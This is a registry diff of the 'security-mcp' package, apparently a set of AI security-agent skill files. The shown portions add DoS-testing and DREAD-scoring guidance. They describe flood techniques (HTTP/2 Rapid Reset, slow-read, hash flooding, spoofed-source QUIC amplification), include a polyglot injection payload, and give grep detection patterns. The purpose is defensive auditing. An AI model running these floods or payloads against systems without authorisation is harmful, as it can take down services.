security-mcp 1.1.4 → 1.3.3
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +341 -1018
- package/defaults/checklists/ai.json +20 -1
- package/defaults/checklists/api.json +35 -1
- package/defaults/checklists/infra.json +34 -1
- package/defaults/checklists/mobile.json +23 -1
- package/defaults/checklists/payments.json +15 -1
- package/defaults/checklists/web.json +11 -1
- package/defaults/cloud-controls/aws.json +10712 -0
- package/defaults/cloud-controls/azure.json +7201 -0
- package/defaults/cloud-controls/gcp.json +4061 -0
- package/defaults/control-catalog.json +24 -0
- package/defaults/security-policy.json +2 -2
- package/dist/ci/pr-gate.js +22 -5
- package/dist/cli/index.js +73 -2
- package/dist/cli/install.js +4 -55
- package/dist/cli/onboarding.js +18 -10
- package/dist/gate/baseline.js +82 -7
- package/dist/gate/catalog.js +10 -2
- package/dist/gate/checks/agentic-instructions.js +515 -0
- package/dist/gate/checks/ai-governance.js +132 -0
- package/dist/gate/checks/ai.js +757 -39
- package/dist/gate/checks/auth-deep.js +920 -216
- package/dist/gate/checks/business-logic.js +751 -0
- package/dist/gate/checks/ci-pipeline.js +399 -4
- package/dist/gate/checks/cloud-controls.js +69 -0
- package/dist/gate/checks/crypto.js +423 -2
- package/dist/gate/checks/data-platform.js +954 -0
- package/dist/gate/checks/dependencies.js +582 -15
- package/dist/gate/checks/docker-deep.js +1236 -0
- package/dist/gate/checks/gitops.js +724 -0
- package/dist/gate/checks/graphql.js +201 -19
- package/dist/gate/checks/iac.js +1230 -0
- package/dist/gate/checks/infra.js +246 -1
- package/dist/gate/checks/injection-deep.js +827 -184
- package/dist/gate/checks/k8s.js +955 -2
- package/dist/gate/checks/mobile-android.js +917 -3
- package/dist/gate/checks/mobile-ios.js +797 -5
- package/dist/gate/checks/required-artifacts.js +194 -0
- package/dist/gate/checks/runtime.js +178 -0
- package/dist/gate/checks/secrets.js +256 -13
- package/dist/gate/checks/supply-chain-deep.js +787 -0
- package/dist/gate/checks/web-nextjs.js +572 -48
- package/dist/gate/cloud-controls/apply.js +115 -0
- package/dist/gate/cloud-controls/bicep.js +36 -0
- package/dist/gate/cloud-controls/cfn.js +125 -0
- package/dist/gate/cloud-controls/detect.js +104 -0
- package/dist/gate/cloud-controls/hcl.js +140 -0
- package/dist/gate/cloud-controls/types.js +87 -0
- package/dist/gate/diff.js +17 -5
- package/dist/gate/evidence.js +8 -1
- package/dist/gate/exceptions.js +202 -9
- package/dist/gate/findings.js +15 -2
- package/dist/gate/policy.js +316 -130
- package/dist/gate/threat-intel.js +6 -0
- package/dist/mcp/audit-chain.js +131 -28
- package/dist/mcp/auth.js +169 -0
- package/dist/mcp/learning.js +129 -4
- package/dist/mcp/model-router.js +161 -24
- package/dist/mcp/orchestration.js +377 -89
- package/dist/mcp/server.js +460 -69
- package/dist/mcp/tool-audit.js +193 -0
- package/dist/repo/fs.js +37 -1
- package/dist/repo/search.js +31 -6
- package/dist/review/store.js +56 -3
- package/dist/tests/run.js +124 -1
- package/package.json +9 -9
- package/skills/_TEMPLATE/SKILL.md +99 -0
- package/skills/advanced-dos-tester/SKILL.md +118 -0
- package/skills/agentic-instruction-auditor/SKILL.md +111 -0
- package/skills/agentic-loop-exploiter/SKILL.md +377 -0
- package/skills/ai-llm-redteam/SKILL.md +113 -0
- package/skills/ai-model-supply-chain-agent/SKILL.md +112 -0
- package/skills/algorithm-implementation-reviewer/SKILL.md +107 -0
- package/skills/android-penetration-tester/SKILL.md +464 -46
- package/skills/anti-replay-tester/SKILL.md +115 -0
- package/skills/appsec-code-auditor/SKILL.md +94 -0
- package/skills/artifact-integrity-analyst/SKILL.md +450 -0
- package/skills/attack-navigator/SKILL.md +476 -8
- package/skills/auth-session-hacker/SKILL.md +111 -0
- package/skills/aws-penetration-tester/SKILL.md +510 -0
- package/skills/azure-penetration-tester/SKILL.md +542 -3
- package/skills/binary-auth-validator/SKILL.md +120 -0
- package/skills/bot-detection-specialist/SKILL.md +118 -0
- package/skills/business-logic-attacker/SKILL.md +240 -0
- package/skills/capec-code-mapper/SKILL.md +93 -0
- package/skills/cert-pin-rotation-specialist/SKILL.md +121 -0
- package/skills/cicd-pipeline-hijacker/SKILL.md +414 -0
- package/skills/ciso-orchestrator/SKILL.md +465 -43
- package/skills/cloud-infra-specialist/SKILL.md +127 -0
- package/skills/compliance-gap-analyst/SKILL.md +431 -0
- package/skills/compliance-grc/SKILL.md +94 -0
- package/skills/compliance-lifecycle-tracker/SKILL.md +93 -0
- package/skills/container-hardening-auditor/SKILL.md +125 -0
- package/skills/credential-stuffing-specialist/SKILL.md +111 -0
- package/skills/crypto-pki-specialist/SKILL.md +96 -0
- package/skills/csa-ccm-mapper/SKILL.md +93 -0
- package/skills/csf2-governance-mapper/SKILL.md +93 -0
- package/skills/data-platform-auditor/SKILL.md +125 -0
- package/skills/deep-link-fuzzer/SKILL.md +118 -0
- package/skills/dependency-confusion-attacker/SKILL.md +424 -0
- package/skills/device-integrity-aggregator/SKILL.md +117 -0
- package/skills/dos-resilience-tester/SKILL.md +106 -0
- package/skills/dread-scorer/SKILL.md +93 -0
- package/skills/egress-policy-enforcer/SKILL.md +108 -0
- package/skills/evidence-collector/SKILL.md +107 -0
- package/skills/file-upload-attacker/SKILL.md +118 -0
- package/skills/gcp-penetration-tester/SKILL.md +510 -2
- package/skills/git-history-secret-scanner/SKILL.md +115 -0
- package/skills/gitops-delivery-auditor/SKILL.md +120 -0
- package/skills/iac-security-auditor/SKILL.md +125 -0
- package/skills/iam-privesc-graph-builder/SKILL.md +161 -0
- package/skills/incident-responder/SKILL.md +120 -0
- package/skills/injection-specialist/SKILL.md +111 -0
- package/skills/ios-security-auditor/SKILL.md +291 -0
- package/skills/json-ambiguity-tester/SKILL.md +145 -0
- package/skills/k8s-container-escaper/SKILL.md +406 -0
- package/skills/key-management-lifecycle-analyst/SKILL.md +107 -0
- package/skills/kill-switch-engineer/SKILL.md +111 -0
- package/skills/linddun-privacy-analyst/SKILL.md +111 -0
- package/skills/logic-race-fuzzer/SKILL.md +452 -0
- package/skills/mobile-api-network-attacker/SKILL.md +430 -0
- package/skills/mobile-binary-hardener/SKILL.md +111 -0
- package/skills/mobile-security-specialist/SKILL.md +94 -0
- package/skills/mobile-webview-auditor/SKILL.md +105 -0
- package/skills/model-extraction-attacker/SKILL.md +228 -0
- package/skills/multipart-abuse-tester/SKILL.md +93 -0
- package/skills/oauth-pkce-specialist/SKILL.md +113 -0
- package/skills/parser-exhaustion-tester/SKILL.md +151 -0
- package/skills/pentest-infra/SKILL.md +107 -0
- package/skills/pentest-social/SKILL.md +210 -0
- package/skills/pentest-team/SKILL.md +96 -0
- package/skills/pentest-web-api/SKILL.md +107 -0
- package/skills/privacy-flow-analyst/SKILL.md +243 -0
- package/skills/prompt-injection-specialist/SKILL.md +403 -0
- package/skills/quantum-migration-planner/SKILL.md +105 -0
- package/skills/rag-poisoning-specialist/SKILL.md +367 -0
- package/skills/registry-mirror-enforcer/SKILL.md +93 -0
- package/skills/rotation-validation-agent/SKILL.md +121 -0
- package/skills/samm-assessor/SKILL.md +94 -0
- package/skills/secrets-mask-bypass-tester/SKILL.md +109 -0
- package/skills/senior-security-engineer/SKILL.md +178 -0
- package/skills/serialization-memory-attacker/SKILL.md +341 -0
- package/skills/session-timeout-tester/SKILL.md +170 -0
- package/skills/slsa-level3-enforcer/SKILL.md +121 -0
- package/skills/slsa-provenance-enforcer/SKILL.md +111 -0
- package/skills/ssrf-detection-validator/SKILL.md +117 -0
- package/skills/step-up-auth-enforcer/SKILL.md +93 -0
- package/skills/stride-pasta-analyst/SKILL.md +429 -0
- package/skills/supply-chain-devsecops/SKILL.md +107 -0
- package/skills/threat-infrastructure-analyst/SKILL.md +93 -0
- package/skills/threat-modeler/SKILL.md +94 -0
- package/skills/tls-certificate-auditor/SKILL.md +582 -18
- package/skills/token-reuse-detector/SKILL.md +104 -0
- package/skills/trike-risk-modeler/SKILL.md +93 -0
- package/skills/unicode-homograph-tester/SKILL.md +93 -0
- package/skills/waf-rule-lifecycle-agent/SKILL.md +106 -0
- package/skills/webhook-security-tester/SKILL.md +111 -0
- package/skills/zero-trust-architect/SKILL.md +118 -0
|
@@ -34,6 +34,15 @@ On every finding resolved, emit:
|
|
|
34
34
|
}
|
|
35
35
|
```
|
|
36
36
|
|
|
37
|
+
## BEYOND THE CHECKS — AUTONOMOUS DETECT & FIX
|
|
38
|
+
|
|
39
|
+
The `runtime` detection module (`src/gate/checks/runtime.ts`) is your deterministic floor, not your ceiling. Treat its finding IDs as the minimum, then reason past single-line/single-file pattern matching — and APPLY the fix (Edit), not just advise:
|
|
40
|
+
|
|
41
|
+
- **Cross-file / data-flow reasoning the regex can't do:** a body-size limit on the Express app means nothing if a GraphQL resolver fans out N+1 queries or a route handler calls `findMany()` with no `take` — trace user-controlled `limit`/`page`/query-depth params through to the actual DB or regex sink, across files, to find the unbounded path.
|
|
42
|
+
- **Semantic / effective-state analysis:** model the algorithmic-complexity blast radius — does a crafted input cause catastrophic regex backtracking, GraphQL alias amplification, hash-flooding, or HTTP/2 Rapid Reset? Compute whether a single request can exhaust CPU/memory/DB connections, not just whether a `limit` literal appears somewhere.
|
|
43
|
+
- **External corroboration:** WebSearch/WebFetch for current ReDoS/DoS CVEs in transitive dependencies and HTTP/2/QUIC amplification advisories for the server stack in use.
|
|
44
|
+
- **Apply & prove:** write the fix inline (body/pagination caps, RE2 for nested-quantifier regex, depth+complexity rules, outbound `AbortSignal.timeout`, pool limits), re-run the `runtime` checks plus `safe-regex`/`osv-scanner` and a `k6`/`slowhttptest` load probe as a regression floor, then re-audit. Emit the LEARNING SIGNAL per fix; surface trade-offs with the secure default.
|
|
45
|
+
|
|
37
46
|
## EXECUTION
|
|
38
47
|
|
|
39
48
|
### Phase 1 — Reconnaissance
|
|
@@ -182,3 +191,100 @@ If internet permitted:
|
|
|
182
191
|
- `requiredActions`: ordered action list
|
|
183
192
|
- `complianceImpact`: framework mappings
|
|
184
193
|
- `beyondSkillMd`: true if finding goes beyond the SKILL.md mandate
|
|
194
|
+
|
|
195
|
+
Every findings JSON MUST include `intelligenceForOtherAgents`:
|
|
196
|
+
```json
|
|
197
|
+
{
|
|
198
|
+
"intelligenceForOtherAgents": {
|
|
199
|
+
"forPentestTeam": [{ "type": "HIGH_VALUE_TARGET", "description": "Endpoint with no rate limit or body-size cap — ideal DoS entry point", "exploitHint": "Send concurrent slow-loris or large-body floods to this path" }],
|
|
200
|
+
"forCryptoSpecialist": [{ "type": "CRYPTO_WEAKNESS_REFERENCE", "algorithm": "N/A — refer if TLS session renegotiation DoS found", "location": "" }],
|
|
201
|
+
"forCloudSpecialist": [{ "type": "RESOURCE_EXHAUSTION_CHAIN", "exhaustionLocation": "No Pod CPU/memory limits set", "escalationPath": "Single flooded pod triggers OOMKill, cascades to sibling pods on same node" }],
|
|
202
|
+
"forComplianceGrc": [{ "type": "COMPLIANCE_BLOCKER", "frameworks": ["PCI DSS Req 6.4.1", "SOC 2 A1.1", "NIST SP 800-53 SC-5"], "releaseBlock": true }]
|
|
203
|
+
}
|
|
204
|
+
}
|
|
205
|
+
```
|
|
206
|
+
|
|
207
|
+
## BEYOND SKILL.MD — MANDATORY EXPANSIONS
|
|
208
|
+
|
|
209
|
+
- **HTTP/2 Rapid Reset Attack (CVE-2023-44487 / ATT&CK T1499.002):** Attacker sends a stream of RST_STREAM frames immediately after HEADERS frames, forcing the server to allocate and immediately tear down streams at extremely high rate — the attack that took down Cloudflare, Google, and AWS simultaneously in Oct 2023. Test by: use `h2load` or a custom HTTP/2 client to send 1 000 concurrent stream open+reset cycles per second; measure server CPU and connection-handler goroutine/thread count. Finding threshold: if CPU exceeds 80% at < 10 Mbps inbound traffic, the server is unpatched or unmitigated — verify `nghttp2`/`hyper`/`netty` version and check `SETTINGS_MAX_CONCURRENT_STREAMS` is enforced at ≤ 100.
|
|
210
|
+
|
|
211
|
+
- **AI-Generated Semantically Valid Flood (ATT&CK T1499.003):** LLM-assisted tools (e.g., FuzzAI, RESTler with GPT guidance) generate structurally and semantically valid API requests — valid auth tokens, realistic field values, correct content-type — that bypass all WAF signature rules and appear as legitimate user traffic. Test by: replay a 48-hour production request log through a load injector at 100× normal rate; if rate limiting does not trigger because requests look "normal," behavioural anomaly detection is absent. Finding threshold: any endpoint that can be flooded at 10× normal RPS without a 429 response using realistic-looking payloads is a confirmed finding.
|
|
212
|
+
|
|
213
|
+
- **QUIC/HTTP3 Address Amplification via Stateless Retry (CVE-2022-30592 / QUIC RFC 9000 §8.1):** QUIC's stateless retry mechanism allows an attacker to spoof a victim's source IP and direct a bandwidth-amplified response stream at the victim before connection establishment completes. Any service advertising `Alt-Svc: h3` is a potential reflector. Test by: send a QUIC Initial packet with a spoofed source IP to the service using `quic-go`'s test harness; confirm the Retry packet is sent to the spoofed address and measure the amplification factor. Finding threshold: amplification factor > 3× is a reportable finding; absence of address validation tokens (the fix) is always CRITICAL.
|
|
214
|
+
|
|
215
|
+
- **Supply-Chain ReDoS via Transitive Dependency (e.g., `ua-parser-js` CVE-2021-27292, `validator.js` CVE-2021-3765):** Malicious or unpatched regex in a transitive npm/PyPI dependency executes in the hot request-handling path — not in application code the developer wrote. The application passes all own-code ReDoS checks. Test by: run `npx safe-regex-cli --deep` against the full `node_modules` tree (not just app source); additionally run `npm audit` filtered for `redos` and cross-reference against the OSV database (`osv.dev`). Finding threshold: any reachable transitive dependency with a known ReDoS CVE in a code path touched by user-controlled input is CRITICAL.
|
|
216
|
+
|
|
217
|
+
- **GraphQL Persisted Query Cache Poisoning as DoS (ATT&CK T1499.003):** Attackers register an extremely expensive persisted query hash, then flood the API with that hash ID. The server looks up the pre-registered query and executes it at full cost — bypassing body-size and query-string-length limits because the request body is just a short hash string. Test by: register a deeply nested persisted query that hits the complexity cap, then send 500 concurrent requests with that hash; confirm the server's complexity limiter still fires per-request even for persisted queries. Finding threshold: if persisted query execution bypasses complexity or depth validation, severity is CRITICAL.
|
|
218
|
+
|
|
219
|
+
- **EU Cyber Resilience Act (CRA) + NIS2 Availability Attestation Gap (2026 enforcement):** CRA Article 13 and NIS2 Article 21 require documented and tested DDoS mitigation SLAs for products and essential services respectively. Most teams have informal WAF/CDN configs but no auditable test evidence. Test by: run a structured availability stress test (e.g., `k6` at 5× peak load) and record the test plan, results, RTO observed, and failover behaviour in a machine-readable artefact; verify the artefact is committed to the repo and referenced in the security policy document. Finding threshold: absence of a dated, versioned availability test report with measured RTO/RPO is a compliance blocker for any EU-market product subject to CRA or NIS2.
|
|
220
|
+
|
|
221
|
+
## §EDGE-CASE-MATRIX
|
|
222
|
+
|
|
223
|
+
The 5 DoS attack cases that automated scanners and naive manual review universally miss. MANDATORY checks — do not skip.
|
|
224
|
+
|
|
225
|
+
| # | Edge Case | Why Scanners Miss It | Concrete Test |
|
|
226
|
+
|---|-----------|----------------------|---------------|
|
|
227
|
+
| 1 | GraphQL alias/fragment amplification — one request fans out to thousands of resolver calls via aliased repeated fields | Depth/complexity rules count nodes once; aliases let attackers clone a costly field 500× under one depth level | Submit `{ a1: expensiveField a2: expensiveField … a500: expensiveField }` — measure DB queries emitted; should be rejected by complexity budget |
|
|
228
|
+
| 2 | Rate-limiter bypass via IP rotation through a trusted proxy header (`X-Forwarded-For` spoofing) | Rate limiter reads `req.ip` which honours the first `X-Forwarded-For` value — attacker cycles fake IPs | Send requests with `X-Forwarded-For: <random_ip>` and verify the limiter still enforces per-real-IP; check `trust proxy` config |
|
|
229
|
+
| 3 | Algorithmic DoS via hash-collision (hash flooding) — POST bodies with many keys that collide in the server's hash map, forcing O(n²) insert | Static code analysis sees a normal JSON parse; the exploit is data-dependent | POST a body with 10 000 crafted keys known to collide in V8's object hash (use `hash-flood` corpus); measure CPU time vs. 10 000 normal keys |
|
|
230
|
+
| 4 | Slow-read attack — attacker advertises a tiny TCP receive window, forcing the server to drip-send responses and hold connections open indefinitely | Load testers measure throughput; slow-read holds a socket without sending traffic, which doesn't trigger standard request-rate rules | Use `slowhttptest -B` (slow read mode) against the target; server should enforce a minimum send-rate timeout and close stalled connections |
|
|
231
|
+
| 5 | ReDoS triggered at serialisation time — regex applied during JSON serialisation or logging of the response body, not during input validation | Input-phase scanners test the validation layer; the dangerous regex runs on output after all guards have passed | Trace all regex calls that touch `res.body` or log formatters; submit a deeply nested object that causes catastrophic backtracking in the serialiser's key-name sanitiser |
|
|
232
|
+
|
|
233
|
+
## §TEMPORAL-THREATS
|
|
234
|
+
|
|
235
|
+
Threats materialising in the 2025–2030 window that DoS defences designed today must account for.
|
|
236
|
+
|
|
237
|
+
| Threat | Est. Timeline | Relevance to DoS Domain | Prepare Now By |
|
|
238
|
+
|--------|--------------|--------------------------|----------------|
|
|
239
|
+
| AI-assisted flood generation — LLMs generate valid, application-aware request payloads that bypass content-based WAF rules | 2025–2027 (active) | Application-layer floods look semantically legitimate; signature-based WAFs block nothing | Move to behavioural rate limiting (request velocity + entropy of params) rather than signature matching |
|
|
240
|
+
| HTTP/3 + QUIC amplification — QUIC's stateless handshake allows reflection amplification before connection establishment | 2025–2026 | Any service enabling HTTP/3 is a new reflection target | Audit `Alt-Svc` headers; implement QUIC address validation tokens; cap max QUIC connections per source |
|
|
241
|
+
| eBPF-based kernel-level flood bypass — attackers use eBPF programs on compromised hosts to craft floods that bypass userspace rate limiters | 2026–2028 | Kernel-crafted floods have no userspace fingerprint | Enforce rate limiting at the CDN/network edge (not only in the app process); deploy TCP SYN cookies at kernel level |
|
|
242
|
+
| EU CRA (Cyber Resilience Act) availability SLA requirements | 2026 enforcement | Products must demonstrate quantified availability controls or face fines | Document and test uptime SLAs, DDoS mitigation SLAs, and failover RTO/RPO — make them auditable |
|
|
243
|
+
| Serverless/FaaS cold-start cost amplification attacks — adversaries trigger thousands of cold starts to exhaust cloud budget | 2025 (active) | Cold starts cost 10–50× more compute per request; an attacker can bankrupt a serverless app without exceeding request rate limits | Set max concurrency limits on all Lambda/Cloud Run/Functions; implement spending alerts with auto-shutdown at budget cap |
|
|
244
|
+
|
|
245
|
+
## §DETECTION-GAP
|
|
246
|
+
|
|
247
|
+
What current security monitoring CANNOT detect in the DoS domain, and what to build to close each gap.
|
|
248
|
+
|
|
249
|
+
- **GraphQL alias amplification**: No log event distinguishes `{ a: field }` from `{ a1: field a2: field … a500: field }` — the query looks like one request. **Need**: log the computed complexity score per query; alert when complexity > 80% of the cap.
|
|
250
|
+
- **Rate-limiter IP spoofing via X-Forwarded-For**: Limiter enforces correctly per its view of `req.ip`, but the true attacker IP is never logged. **Need**: log both `req.ip` (as seen by the app) and the raw `X-Forwarded-For` header value; cross-correlate in SIEM to detect single-actor cycling.
|
|
251
|
+
- **Slow-loris / slow-read in progress**: Each connection looks idle — no request rate anomaly fires. **Need**: track per-connection duration at the load balancer layer; alert on connections open > 30 s with < 1 KB transferred.
|
|
252
|
+
- **Algorithmic / hash-flood CPU spike**: CPU alarm fires, but the cause looks like a traffic spike. **Need**: instrument the JSON-parsing layer with a per-request timer; when parse time exceeds 50 ms for a payload < 100 KB, flag it as a potential hash-flood candidate and log the key count.
|
|
253
|
+
- **Serverless cost-amplification attack**: Cloud billing alarms lag by hours; the attack drains budget before the alert fires. **Need**: real-time concurrency and invocation-count dashboards with p95 alerts; set hard concurrency caps on every function, not just aggregate billing alerts.
|
|
254
|
+
- **Cross-agent chain — DoS + Auth bypass**: An auth bypass (Phase 1 finding from auth-bypass agent) that allows unauthenticated access to expensive endpoints is a force-multiplier for DoS. **Need**: CISO orchestrator synthesis step — any unauth endpoint flagged by auth-bypass agent must be re-scored by this agent for DoS blast radius.
|
|
255
|
+
|
|
256
|
+
## §ZERO-MISS-MANDATE
|
|
257
|
+
|
|
258
|
+
This agent CANNOT declare any DoS attack class clean without explicit evidence of checking. For each item, output one of:
|
|
259
|
+
- `CHECKED: [N files] | [patterns used] | CLEAN`
|
|
260
|
+
- `CHECKED: [N files] | [patterns used] | [N findings, all fixed]`
|
|
261
|
+
- `SKIPPED: [reason — must be "not applicable: [evidence]"]`
|
|
262
|
+
|
|
263
|
+
**Silent skip = FAILED COVERAGE.** The orchestrator flags this as a quality gap.
|
|
264
|
+
|
|
265
|
+
**Mandatory DoS attack classes to cover:**
|
|
266
|
+
|
|
267
|
+
| Attack Class | Grep Patterns | Must Check |
|
|
268
|
+
|---|---|---|
|
|
269
|
+
| Unbounded DB queries | `findAll\|findMany\|\.all\(\)\|SELECT \*` without `LIMIT\|take\|limit` | Every ORM/raw query call site |
|
|
270
|
+
| Missing body size limit | `express\(\)\|bodyParser\|fastify\|createServer` | Server init files |
|
|
271
|
+
| ReDoS-vulnerable regex | Nested quantifiers: `\(\.\*\)\+\|\(\.\+\)\*\|\([a-z\]\+\)\*` | All regex literals in hot paths |
|
|
272
|
+
| No GraphQL depth/complexity limit | `ApolloServer\|makeExecutableSchema\|yoga\|graphql-ws` without `depthLimit\|complexityLimit` | GraphQL server config |
|
|
273
|
+
| No pagination cap | `page=\|offset=\|limit=` query param handling | All list/search endpoints |
|
|
274
|
+
| No outbound HTTP timeout | `fetch\|axios\|got\|request\|http\.get` without `timeout\|AbortSignal` | All external HTTP calls |
|
|
275
|
+
| No DB connection pool limit | `PrismaClient\|createPool\|knex\|mongoose\.connect` | DB client init files |
|
|
276
|
+
| Synchronous blocking I/O in request handler | `readFileSync\|execSync\|spawnSync` inside route handlers | Route handler files |
|
|
277
|
+
|
|
278
|
+
The output findings JSON MUST include a `coverageManifest` key:
|
|
279
|
+
```json
|
|
280
|
+
{
|
|
281
|
+
"coverageManifest": {
|
|
282
|
+
"attackClassesCovered": [
|
|
283
|
+
{ "class": "Unbounded DB Query", "filesReviewed": 34, "patterns": ["findMany without take", "SELECT * without LIMIT"], "result": "2 findings — fixed" },
|
|
284
|
+
{ "class": "ReDoS Regex", "filesReviewed": 22, "patterns": ["nested quantifier regex literals"], "result": "CLEAN" }
|
|
285
|
+
],
|
|
286
|
+
"filesReviewed": 47,
|
|
287
|
+
"negativeAssertions": ["ReDoS: nested-quantifier regex searched across 22 files — 0 matches"],
|
|
288
|
+
"uncoveredReason": {}
|
|
289
|
+
}
|
|
290
|
+
}
|
|
@@ -34,6 +34,15 @@ On every finding resolved, emit:
|
|
|
34
34
|
}
|
|
35
35
|
```
|
|
36
36
|
|
|
37
|
+
## BEYOND THE CHECKS — AUTONOMOUS DETECT & FIX
|
|
38
|
+
|
|
39
|
+
The full suite of detection modules in `src/gate/checks/` (especially `injection-deep.ts`, `infra.ts`, `runtime.ts`, and `auth-deep.ts`) is the deterministic input you score — their finding IDs are your floor, not your ceiling. Treat every emitted finding as the minimum population, then reason past single-line/single-file pattern matching when calibrating each D/R/E/A/D dimension — and APPLY the score-driven re-prioritisation (Edit the risk register), not just advise:
|
|
40
|
+
|
|
41
|
+
- **Cross-file / data-flow reasoning the regex can't do:** a SQLi finding from `injection-deep.ts` and an IAM `iam:PassRole` finding from `infra.ts` may each be HIGH alone but compose into a 50/50 chain — score the chain, not the parts. Raise Affected-Users / Damage when the data-flow connects two single-file findings.
|
|
42
|
+
- **Semantic / effective-state analysis:** recompute Discoverability for public/open-source code (LLM-fuzzing lifts D=3→7), apply the TOCTOU Reproducibility correction for race findings, and record a temporal-DREAD score for harvest-now-decrypt-later crypto findings.
|
|
43
|
+
- **External corroboration:** WebSearch/WebFetch for CISA KEV, EPSS, and active-exploitation status to anchor Exploitability and Discoverability against real-world data, not assumption.
|
|
44
|
+
- **Apply & prove:** write the re-ranked register inline, re-run the upstream module checks (e.g. `injection-deep`/`runtime`) so the scored finding set matches a regression floor, then re-audit ordering against CVSS. Emit the LEARNING SIGNAL per scored finding; surface trade-offs where DREAD and CVSS diverge.
|
|
45
|
+
|
|
37
46
|
## EXECUTION
|
|
38
47
|
|
|
39
48
|
### Phase 1 — Reconnaissance
|
|
@@ -155,3 +164,87 @@ Priority: Address within 30 days
|
|
|
155
164
|
- `requiredActions`: risk-ordered remediation list
|
|
156
165
|
- `complianceImpact`: inherited framework mappings
|
|
157
166
|
- `beyondSkillMd`: true — this agent is entirely beyond-policy
|
|
167
|
+
|
|
168
|
+
Every findings JSON MUST include `intelligenceForOtherAgents`:
|
|
169
|
+
```json
|
|
170
|
+
{
|
|
171
|
+
"intelligenceForOtherAgents": {
|
|
172
|
+
"forPentestTeam": [{ "type": "HIGH_VALUE_TARGET", "description": "...", "exploitHint": "..." }],
|
|
173
|
+
"forCryptoSpecialist": [{ "type": "CRYPTO_WEAKNESS_REFERENCE", "algorithm": "...", "location": "..." }],
|
|
174
|
+
"forCloudSpecialist": [{ "type": "SSRF_TO_CLOUD_CHAIN", "ssrfLocation": "...", "escalationPath": "..." }],
|
|
175
|
+
"forComplianceGrc": [{ "type": "COMPLIANCE_BLOCKER", "frameworks": ["..."], "releaseBlock": true }]
|
|
176
|
+
}
|
|
177
|
+
}
|
|
178
|
+
```
|
|
179
|
+
|
|
180
|
+
## BEYOND SKILL.MD
|
|
181
|
+
|
|
182
|
+
Domain-specific expansions for DREAD scoring — concrete CVEs, techniques, tools, and research findings that sharpen score calibration:
|
|
183
|
+
|
|
184
|
+
- **CVE-2021-44228 (Log4Shell)** — DREAD baseline reference: scored 50/50 in nearly every real-world assessment. Use this as the anchor for "what a true 50 looks like": unauthenticated RCE, trivially reproducible, weaponized within hours, affects every internet-facing system running Log4j 2.x. Any finding that does not approach all five dimensions simultaneously should not score 45+.
|
|
185
|
+
- **CVE-2022-0847 (Dirty Pipe)** — canonical example of asymmetric DREAD scoring: Exploitability=9 (public PoC, minutes to root), Affected Users=3 (requires local shell). Total ~35, not 50. Use to calibrate that high E without wide A caps the score significantly.
|
|
186
|
+
- **CVSS vs. DREAD divergence** — CVSS AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H = 10.0, but DREAD Affected Users may be 1 if the vulnerable endpoint is only reachable by a single internal service. Always reconcile CVSS ≥9.0 findings against DREAD A score before sprint-assigning them as CRITICAL.
|
|
187
|
+
- **AI-era threat: LLM-assisted fuzzing multiplies Discoverability scores** — Tools such as OSS-Fuzz + Llama-based harness generation (Google Project Zero, 2024) mean that findings previously scored D=3 (requires source code) should now score D=7 if the codebase is public or the binary is decompilable. Adjust D scores upward by 2-3 for any public-facing open-source component.
|
|
188
|
+
- **AI-era threat: Automated exploit generation (Exploit.ai / Vulnhuntr)** — LLM-powered end-to-end PoC generation (e.g., Vulnhuntr, 2024 research: https://github.com/protectai/vulnhuntr) can reduce time-to-exploit from days to minutes for logic flaws in Python and JavaScript. Any finding in an interpreted language with a public PoC framework available should receive E≥8.
|
|
189
|
+
- **Post-quantum harvest-now-decrypt-later** — Scored via a specialised DREAD extension: Damage=10 (full retroactive plaintext), Reproducibility=10 (passive capture requires no auth), Exploitability=2 today but trending to 9 by 2030 (CRQC timeline), Affected Users=10 (all users whose data was ever transmitted), Discoverability=10 (network traffic is observable). Record a "temporal DREAD" score alongside the present-day score so the risk register captures forward exposure.
|
|
190
|
+
- **CVE-2023-44487 (HTTP/2 Rapid Reset)** — Reproducibility=10, Affected Users=10 for any HTTP/2-enabled service. Exploitability=8 (public tooling, Slowloris-style). Use as the benchmark for pure availability/DoS findings: high R and A can push a DoS to CRITICAL even when Damage is "only" availability loss.
|
|
191
|
+
- **TOCTOU scoring rule** — Race-condition findings are systematically under-scored because Reproducibility appears low in single-threaded testing. Apply a TOCTOU correction: if a race condition is exploitable with concurrent threads (as in CVE-2022-21449 "Psychic Signatures"), set R≥7 regardless of observed single-thread reliability. Document the correction in the evidence field.
|
|
192
|
+
|
|
193
|
+
---
|
|
194
|
+
|
|
195
|
+
## §EDGE-CASE-MATRIX
|
|
196
|
+
|
|
197
|
+
The 5 attack cases in this domain that automated scanners and naive manual review universally miss. MANDATORY checks — do not skip.
|
|
198
|
+
|
|
199
|
+
| # | Edge Case | Why Scanners Miss It | Concrete Test |
|
|
200
|
+
|---|-----------|----------------------|---------------|
|
|
201
|
+
| 1 | Second-order / stored payload executed in different context | Scanner checks input context, not execution context | Store payload safely; trigger in separate request/session |
|
|
202
|
+
| 2 | Unicode normalisation bypass | Regex filters run before normalisation; attacker uses homoglyphs or composed forms | Submit Ⅰ (U+2160) or < (U+FF1C) variants of known-bad strings |
|
|
203
|
+
| 3 | Polyglot payload active in multiple sinks simultaneously | Scanners test one injection class per payload | `'"><script>{{7*7}}</script><!--` — SQL + XSS + SSTI in one request |
|
|
204
|
+
| 4 | Out-of-band exfiltration (DNS/HTTP callback) | Scanner looks for inline response difference; OOB leaves no visible trace | Use Burp Collaborator / interactsh; inject DNS lookup payload |
|
|
205
|
+
| 5 | Race condition between check and use (TOCTOU) | Sequential scanners don't model concurrency | Send two simultaneous requests to the same state-changing endpoint |
|
|
206
|
+
|
|
207
|
+
## §TEMPORAL-THREATS
|
|
208
|
+
|
|
209
|
+
Threats materialising in the 2025–2030 window that defences designed today must account for.
|
|
210
|
+
|
|
211
|
+
| Threat | Est. Timeline | Relevance to This Domain | Prepare Now By |
|
|
212
|
+
|--------|--------------|--------------------------|----------------|
|
|
213
|
+
| Cryptographically Relevant Quantum Computer (CRQC) | 2028–2032 | Harvest-now-decrypt-later attacks active today; RSA/ECDSA keys signed today will be broken | Inventory all RSA/ECDSA usage; migrate long-lived data to ML-KEM (FIPS 203) |
|
|
214
|
+
| AI-assisted adversaries at scale | 2025–2027 (active) | LLM-powered fuzzing finds 10× more edge cases; automated PoC generation | Assume attackers have LLM help; expand test surface to match |
|
|
215
|
+
| EU AI Act full enforcement | 2026 | High-risk AI systems require mandatory conformity assessments | Classify all AI features against AI Act tiers now |
|
|
216
|
+
